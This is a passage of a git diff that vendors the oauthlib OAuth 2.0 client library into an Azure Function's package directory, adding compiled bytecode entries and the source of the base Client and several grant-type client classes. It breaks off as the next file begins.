and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/parameters.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/request_validator.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/request_validator.cpython-39.pyc new file mode 100644 index 0000000..fa381df Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/request_validator.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/tokens.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/tokens.cpython-39.pyc new file mode 100644 index 0000000..ac1527a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/tokens.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/utils.cpython-39.pyc new file mode 100644 index 0000000..6f95352 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__init__.py new file mode 100644 index 0000000..4116d2e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__init__.py @@ -0,0 +1,14 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming OAuth 2.0 RFC6749. +""" +from .backend_application import BackendApplicationClient +from .base import AUTH_HEADER, BODY, URI_QUERY, Client +from .legacy_application import LegacyApplicationClient +from .mobile_application import MobileApplicationClient +from .service_application import ServiceApplicationClient +from .web_application import WebApplicationClient diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..ace00dd Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/backend_application.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/backend_application.cpython-39.pyc new file mode 100644 index 0000000..99b8ab0 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/backend_application.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/base.cpython-39.pyc new file mode 100644 index 0000000..2c4e49e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/legacy_application.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/legacy_application.cpython-39.pyc new file mode 100644 index 0000000..959baf0 Binary files /dev/null and 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/legacy_application.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/mobile_application.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/mobile_application.cpython-39.pyc new file mode 100644 index 0000000..14edf3a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/mobile_application.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/service_application.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/service_application.cpython-39.pyc new file mode 100644 index 0000000..9f8ec01 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/service_application.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/web_application.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/web_application.cpython-39.pyc new file mode 100644 index 0000000..e1f7f80 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/web_application.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/backend_application.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/backend_application.py new file mode 100644 index 0000000..54b2337 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/backend_application.py @@ -0,0 +1,74 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +from ..parameters import prepare_token_request +from .base import Client + + +class BackendApplicationClient(Client): + + """A public client utilizing the client credentials grant workflow. + + The client can request an access token using only its client + credentials (or other supported means of authentication) when the + client is requesting access to the protected resources under its + control, or those of another resource owner which has been previously + arranged with the authorization server (the method of which is beyond + the scope of this specification). + + The client credentials grant type MUST only be used by confidential + clients. + + Since the client authentication is used as the authorization grant, + no additional authorization request is needed. + """ + + grant_type = 'client_credentials' + + def prepare_request_body(self, body='', scope=None, + include_client_id=False, **kwargs): + """Add the client credentials to the request body. 
+ + The client makes a request to the token endpoint by adding the following parameters using the "application/x-www-form-urlencoded" format per `Appendix B`_ in the HTTP request entity-body: + + :param body: Existing request body (URL encoded string) to embed parameters into. This may contain extra parameters. Default ''. + :param scope: The scope of the access request as described by + `Section 3.3`_. + + :param include_client_id: `True` to send the `client_id` in the + body of the upstream request. This is required + if the client is not authenticating with the + authorization server as described in + `Section 3.2.1`_. False otherwise (default). + :type include_client_id: Boolean + + :param kwargs: Extra credentials to include in the token request. + + The client MUST authenticate with the authorization server as + described in `Section 3.2.1`_. + + The prepared body will include all provided credentials as well as + the ``grant_type`` parameter set to ``client_credentials``:: + + >>> from oauthlib.oauth2 import BackendApplicationClient + >>> client = BackendApplicationClient('your_id') + >>> client.prepare_request_body(scope=['hello', 'world']) + 'grant_type=client_credentials&scope=hello+world' + + .. _`Appendix B`: https://tools.ietf.org/html/rfc6749#appendix-B + .. _`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3 + .. _`Section 3.2.1`: https://tools.ietf.org/html/rfc6749#section-3.2.1 + """ + kwargs['client_id'] = self.client_id + kwargs['include_client_id'] = include_client_id + scope = self.scope if scope is None else scope + return prepare_token_request(self.grant_type, body=body, + scope=scope, **kwargs) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/base.py new file mode 100644 index 0000000..6df33cb --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/base.py @@ -0,0 +1,629 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming OAuth 2.0 RFC6749. +""" +import time +import warnings +import secrets +import re +import hashlib +import base64 + +from oauthlib.common import generate_token +from oauthlib.oauth2.rfc6749 import tokens +from oauthlib.oauth2.rfc6749.errors import ( + InsecureTransportError, TokenExpiredError, +) +from oauthlib.oauth2.rfc6749.parameters import ( + parse_token_response, prepare_token_request, + prepare_token_revocation_request, +) +from oauthlib.oauth2.rfc6749.utils import is_secure_transport + +AUTH_HEADER = 'auth_header' +URI_QUERY = 'query' +BODY = 'body' + +FORM_ENC_HEADERS = { + 'Content-Type': 'application/x-www-form-urlencoded' +} + + +class Client: + """Base OAuth2 client responsible for access token management. + + This class also acts as a generic interface providing methods common to all + client types such as ``prepare_authorization_request`` and + ``prepare_token_revocation_request``. The ``prepare_x_request`` methods are + the recommended way of interacting with clients (as opposed to the abstract + prepare uri/body/etc methods). They are recommended over the older set + because they are easier to use (more consistent) and add a few additional + security checks, such as HTTPS and state checking.
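As a hedged illustration of the ``prepare_x_request`` pattern just described, using the WebApplicationClient added later in this diff (all URLs and the client secret are placeholders)::

    from oauthlib.oauth2 import WebApplicationClient

    client = WebApplicationClient('my-client-id')
    # Step 1: build the redirect; a state string is generated and stored
    url, headers, body = client.prepare_authorization_request(
        'https://provider.example/oauth2/authorize',       # placeholder
        redirect_url='https://app.example/callback')
    # Step 2: after the user returns, exchange the code for a token
    url, headers, body = client.prepare_token_request(
        'https://provider.example/oauth2/token',           # placeholder
        authorization_response='https://app.example/callback?code=abc&state=' + client.state,
        client_secret='my-secret')
    # POST `body` with `headers` to `url`, then feed the JSON response to
    # client.parse_request_body_response().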
+ + Some of these methods require further implementation only provided by the + specific purpose clients such as + :py:class:`oauthlib.oauth2.MobileApplicationClient` and thus you should always + seek to use the client class matching the OAuth workflow you need. For + Python, this is usually :py:class:`oauthlib.oauth2.WebApplicationClient`. + + """ + refresh_token_key = 'refresh_token' + + def __init__(self, client_id, + default_token_placement=AUTH_HEADER, + token_type='Bearer', + access_token=None, + refresh_token=None, + mac_key=None, + mac_algorithm=None, + token=None, + scope=None, + state=None, + redirect_url=None, + state_generator=generate_token, + code_verifier=None, + code_challenge=None, + code_challenge_method=None, + **kwargs): + """Initialize a client with commonly used attributes. + + :param client_id: Client identifier given by the OAuth provider upon + registration. + + :param default_token_placement: Tokens can be supplied in the Authorization + header (default), the URL query component (``query``) or the request + body (``body``). + + :param token_type: OAuth 2 token type. Defaults to Bearer. Change this + if you specify the ``access_token`` parameter and know it is of a + different token type, such as a MAC, JWT or SAML token. Can + also be supplied as ``token_type`` inside the ``token`` dict parameter. + + :param access_token: An access token (string) used to authenticate + requests to protected resources. Can also be supplied inside the + ``token`` dict parameter. + + :param refresh_token: A refresh token (string) used to refresh expired + tokens. Can also be supplied inside the ``token`` dict parameter. + + :param mac_key: Encryption key used with MAC tokens. + + :param mac_algorithm: Hashing algorithm for MAC tokens. + + :param token: A dict of token attributes such as ``access_token``, + ``token_type`` and ``expires_at``. + + :param scope: A list of default scopes to request authorization for. + + :param state: A CSRF protection string used during authorization. + + :param redirect_url: The redirection endpoint on the client side to which + the user returns after authorization. + + :param state_generator: A no argument state generation callable. Defaults + to :py:meth:`oauthlib.common.generate_token`. + + :param code_verifier: PKCE parameter. A cryptographically random string that is used to correlate the + authorization request to the token request. + + :param code_challenge: PKCE parameter. A challenge derived from the code verifier that is sent in the + authorization request, to be verified against later. + + :param code_challenge_method: PKCE parameter. A method that was used to derive code challenge. + Defaults to "plain" if not present in the request. + """ + + self.client_id = client_id + self.default_token_placement = default_token_placement + self.token_type = token_type + self.access_token = access_token + self.refresh_token = refresh_token + self.mac_key = mac_key + self.mac_algorithm = mac_algorithm + self.token = token or {} + self.scope = scope + self.state_generator = state_generator + self.state = state + self.redirect_url = redirect_url + self.code_verifier = code_verifier + self.code_challenge = code_challenge + self.code_challenge_method = code_challenge_method + self.code = None + self.expires_in = None + self._expires_at = None + self.populate_token_attributes(self.token) + + @property + def token_types(self): + """Supported token types and their respective methods + + Additional tokens can be supported by extending this dictionary. 
+ + The Bearer token spec is stable and safe to use. + + The MAC token spec is not yet stable and support for MAC tokens + is experimental and currently matching version 00 of the spec. + """ + return { + 'Bearer': self._add_bearer_token, + 'MAC': self._add_mac_token + } + + def prepare_request_uri(self, *args, **kwargs): + """Abstract method used to create request URIs.""" + raise NotImplementedError("Must be implemented by inheriting classes.") + + def prepare_request_body(self, *args, **kwargs): + """Abstract method used to create request bodies.""" + raise NotImplementedError("Must be implemented by inheriting classes.") + + def parse_request_uri_response(self, *args, **kwargs): + """Abstract method used to parse redirection responses.""" + raise NotImplementedError("Must be implemented by inheriting classes.") + + def add_token(self, uri, http_method='GET', body=None, headers=None, + token_placement=None, **kwargs): + """Add token to the request uri, body or authorization header. + + The access token type provides the client with the information + required to successfully utilize the access token to make a protected + resource request (along with type-specific attributes). The client + MUST NOT use an access token if it does not understand the token + type. + + For example, the "bearer" token type defined in + [`I-D.ietf-oauth-v2-bearer`_] is utilized by simply including the access + token string in the request: + + .. code-block:: http + + GET /resource/1 HTTP/1.1 + Host: example.com + Authorization: Bearer mF_9.B5f-4.1JqM + + while the "mac" token type defined in [`I-D.ietf-oauth-v2-http-mac`_] is + utilized by issuing a MAC key together with the access token which is + used to sign certain components of the HTTP requests: + + .. code-block:: http + + GET /resource/1 HTTP/1.1 + Host: example.com + Authorization: MAC id="h480djs93hd8", + nonce="274312:dj83hs9s", + mac="kDZvddkndxvhGRXZhvuDjEWhGeE=" + + .. _`I-D.ietf-oauth-v2-bearer`: https://tools.ietf.org/html/rfc6749#section-12.2 + .. _`I-D.ietf-oauth-v2-http-mac`: https://tools.ietf.org/html/rfc6749#section-12.2 + """ + if not is_secure_transport(uri): + raise InsecureTransportError() + + token_placement = token_placement or self.default_token_placement + + case_insensitive_token_types = { + k.lower(): v for k, v in self.token_types.items()} + if not self.token_type.lower() in case_insensitive_token_types: + raise ValueError("Unsupported token type: %s" % self.token_type) + + if not (self.access_token or self.token.get('access_token')): + raise ValueError("Missing access token.") + + if self._expires_at and self._expires_at < time.time(): + raise TokenExpiredError() + + return case_insensitive_token_types[self.token_type.lower()](uri, http_method, body, + headers, token_placement, **kwargs) + + def prepare_authorization_request(self, authorization_url, state=None, + redirect_url=None, scope=None, **kwargs): + """Prepare the authorization request. + + This is the first step in many OAuth flows in which the user is + redirected to a certain authorization URL. This method adds + required parameters to the authorization URL. + + :param authorization_url: Provider authorization endpoint URL. + + :param state: CSRF protection string. Will be automatically created if + not provided. The generated state is available via the ``state`` + attribute. Clients should verify that the state is unchanged and + present in the authorization response. 
This verification is done + automatically if using the ``authorization_response`` parameter + with ``prepare_token_request``. + + :param redirect_url: Redirect URL to which the user will be returned + after authorization. Must be provided unless previously setup with + the provider. If provided then it must also be provided in the + token request. + + :param scope: List of scopes to request. Must be equal to + or a subset of the scopes granted when obtaining the refresh + token. If none is provided, the ones provided in the constructor are + used. + + :param kwargs: Additional parameters to include in the request. + + :returns: The prepared request tuple with (url, headers, body). + """ + if not is_secure_transport(authorization_url): + raise InsecureTransportError() + + self.state = state or self.state_generator() + self.redirect_url = redirect_url or self.redirect_url + # do not assign scope to self automatically anymore + scope = self.scope if scope is None else scope + auth_url = self.prepare_request_uri( + authorization_url, redirect_uri=self.redirect_url, + scope=scope, state=self.state, **kwargs) + return auth_url, FORM_ENC_HEADERS, '' + + def prepare_token_request(self, token_url, authorization_response=None, + redirect_url=None, state=None, body='', **kwargs): + """Prepare a token creation request. + + Note that these requests usually require client authentication, either + by including client_id or a set of provider specific authentication + credentials. + + :param token_url: Provider token creation endpoint URL. + + :param authorization_response: The full redirection URL string, i.e. + the location to which the user was redirected after successful + authorization. Used to mine credentials needed to obtain a token + in this step, such as authorization code. + + :param redirect_url: The redirect_url supplied with the authorization + request (if there was one). + + :param state: + + :param body: Existing request body (URL encoded string) to embed parameters + into. This may contain extra parameters. Default ''. + + :param kwargs: Additional parameters to include in the request. + + :returns: The prepared request tuple with (url, headers, body). + """ + if not is_secure_transport(token_url): + raise InsecureTransportError() + + state = state or self.state + if authorization_response: + self.parse_request_uri_response( + authorization_response, state=state) + self.redirect_url = redirect_url or self.redirect_url + body = self.prepare_request_body(body=body, + redirect_uri=self.redirect_url, **kwargs) + + return token_url, FORM_ENC_HEADERS, body + + def prepare_refresh_token_request(self, token_url, refresh_token=None, + body='', scope=None, **kwargs): + """Prepare an access token refresh request. + + Expired access tokens can be replaced by new access tokens without + going through the OAuth dance if the client obtained a refresh token. + This refresh token and authentication credentials can be used to + obtain a new access token, and possibly a new refresh token. + + :param token_url: Provider token refresh endpoint URL. + + :param refresh_token: Refresh token string. + + :param body: Existing request body (URL encoded string) to embed parameters + into. This may contain extra parameters. Default ''. + + :param scope: List of scopes to request. Must be equal to + or a subset of the scopes granted when obtaining the refresh + token. If none is provided, the ones provided in the constructor are + used. + + :param kwargs: Additional parameters to include in the request.
+ + :returns: The prepared request tuple with (url, headers, body). + """ + if not is_secure_transport(token_url): + raise InsecureTransportError() + + # do not assign scope to self automatically anymore + scope = self.scope if scope is None else scope + body = self.prepare_refresh_body(body=body, + refresh_token=refresh_token, scope=scope, **kwargs) + return token_url, FORM_ENC_HEADERS, body + + def prepare_token_revocation_request(self, revocation_url, token, + token_type_hint="access_token", body='', callback=None, **kwargs): + """Prepare a token revocation request. + + :param revocation_url: Provider token revocation endpoint URL. + + :param token: The access or refresh token to be revoked (string). + + :param token_type_hint: ``"access_token"`` (default) or + ``"refresh_token"``. This is optional and if you wish to not pass it you + must provide ``token_type_hint=None``. + + :param body: + + :param callback: A jsonp callback such as ``package.callback`` to be invoked + upon receiving the response. Note that it should not include a () suffix. + + :param kwargs: Additional parameters to include in the request. + + :returns: The prepared request tuple with (url, headers, body). + + Note that JSONP requests may use GET requests as the parameters will + be added to the request URL query as opposed to the request body. + + An example of a revocation request + + .. code-block:: http + + POST /revoke HTTP/1.1 + Host: server.example.com + Content-Type: application/x-www-form-urlencoded + Authorization: Basic czZCaGRSa3F0MzpnWDFmQmF0M2JW + + token=45ghiukldjahdnhzdauz&token_type_hint=refresh_token + + An example of a jsonp revocation request + + .. code-block:: http + + GET /revoke?token=agabcdefddddafdd&callback=package.myCallback HTTP/1.1 + Host: server.example.com + Content-Type: application/x-www-form-urlencoded + Authorization: Basic czZCaGRSa3F0MzpnWDFmQmF0M2JW + + and an error response + + .. code-block:: http + + package.myCallback({"error":"unsupported_token_type"}); + + Note that these requests usually require client credentials, client_id in + the case for public clients and provider specific authentication + credentials for confidential clients. + """ + if not is_secure_transport(revocation_url): + raise InsecureTransportError() + + return prepare_token_revocation_request(revocation_url, token, + token_type_hint=token_type_hint, body=body, callback=callback, + **kwargs) + + def parse_request_body_response(self, body, scope=None, **kwargs): + """Parse the JSON response body. + + If the access token request is valid and authorized, the + authorization server issues an access token as described in + `Section 5.1`_. A refresh token SHOULD NOT be included. If the request + failed client authentication or is invalid, the authorization server + returns an error response as described in `Section 5.2`_. + + :param body: The response body from the token request. + :param scope: Scopes originally requested. If none is provided, the ones + provided in the constructor are used. + :return: Dictionary of token parameters. + :raises: Warning if scope has changed. OAuth2Error if response is invalid. + + These responses are JSON encoded and could easily be parsed without + the assistance of OAuthLib. However, there are a few subtle issues + to be aware of regarding the response which are helpfully addressed + through the raising of various errors. + + A successful response should always contain + + **access_token** + The access token issued by the authorization server. Often + a random string.
+ + **token_type** + The type of the token issued as described in `Section 7.1`_. + Commonly ``Bearer``. + + While it is not mandated it is recommended that the provider include + + **expires_in** + The lifetime in seconds of the access token. For + example, the value "3600" denotes that the access token will + expire in one hour from the time the response was generated. + If omitted, the authorization server SHOULD provide the + expiration time via other means or document the default value. + + **scope** + Providers may supply this in all responses but are required to only + if it has changed since the authorization request. + + .. _`Section 5.1`: https://tools.ietf.org/html/rfc6749#section-5.1 + .. _`Section 5.2`: https://tools.ietf.org/html/rfc6749#section-5.2 + .. _`Section 7.1`: https://tools.ietf.org/html/rfc6749#section-7.1 + """ + scope = self.scope if scope is None else scope + self.token = parse_token_response(body, scope=scope) + self.populate_token_attributes(self.token) + return self.token + + def prepare_refresh_body(self, body='', refresh_token=None, scope=None, **kwargs): + """Prepare an access token request, using a refresh token. + + If the authorization server issued a refresh token to the client, the + client makes a refresh request to the token endpoint by adding the + following parameters using the "application/x-www-form-urlencoded" + format in the HTTP request entity-body: + + grant_type + REQUIRED. Value MUST be set to "refresh_token". + refresh_token + REQUIRED. The refresh token issued to the client. + scope + OPTIONAL. The scope of the access request as described by + Section 3.3. The requested scope MUST NOT include any scope + not originally granted by the resource owner, and if omitted is + treated as equal to the scope originally granted by the + resource owner. Note that if none is provided, the ones provided + in the constructor are used if any. + """ + refresh_token = refresh_token or self.refresh_token + scope = self.scope if scope is None else scope + return prepare_token_request(self.refresh_token_key, body=body, scope=scope, + refresh_token=refresh_token, **kwargs) + + def _add_bearer_token(self, uri, http_method='GET', body=None, + headers=None, token_placement=None): + """Add a bearer token to the request uri, body or authorization header.""" + if token_placement == AUTH_HEADER: + headers = tokens.prepare_bearer_headers(self.access_token, headers) + + elif token_placement == URI_QUERY: + uri = tokens.prepare_bearer_uri(self.access_token, uri) + + elif token_placement == BODY: + body = tokens.prepare_bearer_body(self.access_token, body) + + else: + raise ValueError("Invalid token placement.") + return uri, headers, body + + def create_code_verifier(self, length): + """Create PKCE **code_verifier** used in computing **code_challenge**. + + :param length: REQUIRED. The length of the code_verifier. + + The client first creates a code verifier, "code_verifier", for each + OAuth 2.0 [RFC6749] Authorization Request, in the following manner: + + code_verifier = high-entropy cryptographic random STRING using the + unreserved characters [A-Z] / [a-z] / [0-9] / "-" / "." / "_" / "~" + from Section 2.3 of [RFC3986], with a minimum length of 43 characters + and a maximum length of 128 characters. + + .. 
_`Section 4.1`: https://tools.ietf.org/html/rfc7636#section-4.1 + """ + code_verifier = None + + if not length >= 43: + raise ValueError("Length must be greater than or equal to 43") + + if not length <= 128: + raise ValueError("Length must be less than or equal to 128") + + allowed_characters = re.compile('^[A-Za-z0-9-._~]') + code_verifier = secrets.token_urlsafe(length) + + if not re.search(allowed_characters, code_verifier): + raise ValueError("code_verifier contains invalid characters") + + self.code_verifier = code_verifier + + return code_verifier + + def create_code_challenge(self, code_verifier, code_challenge_method=None): + """Create PKCE **code_challenge** derived from the **code_verifier**. + + :param code_verifier: REQUIRED. The **code_verifier** generated from create_code_verifier(). + :param code_challenge_method: OPTIONAL. The method used to derive the **code_challenge**. Acceptable + values include "S256". DEFAULT is "plain". + + + The client then creates a code challenge derived from the code + verifier by using one of the following transformations on the code + verifier: + + plain + code_challenge = code_verifier + + S256 + code_challenge = BASE64URL-ENCODE(SHA256(ASCII(code_verifier))) + + If the client is capable of using "S256", it MUST use "S256", as + "S256" is Mandatory To Implement (MTI) on the server. Clients are + permitted to use "plain" only if they cannot support "S256" for some + technical reason and know via out-of-band configuration that the + server supports "plain". + + The plain transformation is for compatibility with existing + deployments and for constrained environments that can't use the S256 + transformation. + + .. _`Section 4.2`: https://tools.ietf.org/html/rfc7636#section-4.2 + """ + code_challenge = None + + if code_verifier is None: + raise ValueError("Invalid code_verifier") + + if code_challenge_method is None: + code_challenge_method = "plain" + self.code_challenge_method = code_challenge_method + code_challenge = code_verifier + self.code_challenge = code_challenge + + if code_challenge_method == "S256": + h = hashlib.sha256() + h.update(code_verifier.encode(encoding='ascii')) + sha256_val = h.digest() + code_challenge = bytes.decode(base64.urlsafe_b64encode(sha256_val)) + # replace '+' with '-', '/' with '_', and remove trailing '=' + code_challenge = code_challenge.replace("+", "-").replace("/", "_").replace("=", "") + self.code_challenge = code_challenge + + return code_challenge + + def _add_mac_token(self, uri, http_method='GET', body=None, + headers=None, token_placement=AUTH_HEADER, ext=None, **kwargs): + """Add a MAC token to the request authorization header. + + Warning: MAC token support is experimental as the spec is not yet stable.
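The two PKCE helpers above pair naturally; as a sketch, the S256 transform can be sanity-checked against the RFC 7636 Appendix B test vector (the client id is a placeholder)::

    from oauthlib.oauth2 import WebApplicationClient

    client = WebApplicationClient('my-client-id')
    verifier = client.create_code_verifier(64)     # argument must be 43..128
    challenge = client.create_code_challenge(verifier, code_challenge_method='S256')

    # RFC 7636 Appendix B test vector
    fixed = 'dBjftJeZ4CVP-mB92K27uhbUJU1p1r_wW1gFWFOEjXk'
    assert client.create_code_challenge(fixed, 'S256') == \
        'E9Melhoa2OwvFrEMTJguCHaoeK1t8URWbuGJSstw-cM'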
+ """ + if token_placement != AUTH_HEADER: + raise ValueError("Invalid token placement.") + + headers = tokens.prepare_mac_header(self.access_token, uri, + self.mac_key, http_method, headers=headers, body=body, ext=ext, + hash_algorithm=self.mac_algorithm, **kwargs) + return uri, headers, body + + def _populate_attributes(self, response): + warnings.warn("Please switch to the public method " + "populate_token_attributes.", DeprecationWarning) + return self.populate_token_attributes(response) + + def populate_code_attributes(self, response): + """Add attributes from an auth code response to self.""" + + if 'code' in response: + self.code = response.get('code') + + def populate_token_attributes(self, response): + """Add attributes from a token exchange response to self.""" + + if 'access_token' in response: + self.access_token = response.get('access_token') + + if 'refresh_token' in response: + self.refresh_token = response.get('refresh_token') + + if 'token_type' in response: + self.token_type = response.get('token_type') + + if 'expires_in' in response: + self.expires_in = response.get('expires_in') + self._expires_at = time.time() + int(self.expires_in) + + if 'expires_at' in response: + try: + self._expires_at = int(response.get('expires_at')) + except: + self._expires_at = None + + if 'mac_key' in response: + self.mac_key = response.get('mac_key') + + if 'mac_algorithm' in response: + self.mac_algorithm = response.get('mac_algorithm') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/legacy_application.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/legacy_application.py new file mode 100644 index 0000000..b27af5a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/legacy_application.py @@ -0,0 +1,84 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +from ..parameters import prepare_token_request +from .base import Client + + +class LegacyApplicationClient(Client): + + """A public client using the resource owner password and username directly. + + The resource owner password credentials grant type is suitable in + cases where the resource owner has a trust relationship with the + client, such as the device operating system or a highly privileged + application. The authorization server should take special care when + enabling this grant type, and only allow it when other flows are not + viable. + + The grant type is suitable for clients capable of obtaining the + resource owner's credentials (username and password, typically using + an interactive form). It is also used to migrate existing clients + using direct authentication schemes such as HTTP Basic or Digest + authentication to OAuth by converting the stored credentials to an + access token. + + The method through which the client obtains the resource owner + credentials is beyond the scope of this specification. The client + MUST discard the credentials once an access token has been obtained. 
+ """ + + grant_type = 'password' + + def __init__(self, client_id, **kwargs): + super().__init__(client_id, **kwargs) + + def prepare_request_body(self, username, password, body='', scope=None, + include_client_id=False, **kwargs): + """Add the resource owner password and username to the request body. + + The client makes a request to the token endpoint by adding the + following parameters using the "application/x-www-form-urlencoded" + format per `Appendix B`_ in the HTTP request entity-body: + + :param username: The resource owner username. + :param password: The resource owner password. + :param body: Existing request body (URL encoded string) to embed parameters + into. This may contain extra paramters. Default ''. + :param scope: The scope of the access request as described by + `Section 3.3`_. + :param include_client_id: `True` to send the `client_id` in the + body of the upstream request. This is required + if the client is not authenticating with the + authorization server as described in + `Section 3.2.1`_. False otherwise (default). + :type include_client_id: Boolean + :param kwargs: Extra credentials to include in the token request. + + If the client type is confidential or the client was issued client + credentials (or assigned other authentication requirements), the + client MUST authenticate with the authorization server as described + in `Section 3.2.1`_. + + The prepared body will include all provided credentials as well as + the ``grant_type`` parameter set to ``password``:: + + >>> from oauthlib.oauth2 import LegacyApplicationClient + >>> client = LegacyApplicationClient('your_id') + >>> client.prepare_request_body(username='foo', password='bar', scope=['hello', 'world']) + 'grant_type=password&username=foo&scope=hello+world&password=bar' + + .. _`Appendix B`: https://tools.ietf.org/html/rfc6749#appendix-B + .. _`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3 + .. _`Section 3.2.1`: https://tools.ietf.org/html/rfc6749#section-3.2.1 + """ + kwargs['client_id'] = self.client_id + kwargs['include_client_id'] = include_client_id + scope = self.scope if scope is None else scope + return prepare_token_request(self.grant_type, body=body, username=username, + password=password, scope=scope, **kwargs) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/mobile_application.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/mobile_application.py new file mode 100644 index 0000000..0145abc --- /dev/null +++ 